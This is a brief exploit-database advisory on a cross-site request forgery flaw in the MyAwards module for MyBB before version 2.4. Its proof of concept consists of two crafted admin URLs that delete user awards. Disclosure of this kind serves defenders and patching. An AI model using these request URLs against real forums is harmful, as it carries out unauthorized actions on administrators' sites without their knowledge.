MyAwards MyBB Module – Cross-Site Request Forgery

  • 作者: Vagineer
    日期: 2014-08-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39290/
  • source: https://www.securityfocus.com/bid/69386/info
    
    MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.
    
    An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.
    
    Versions prior to MyAwards 2.4 are vulnerable. 
    
    https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
    https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1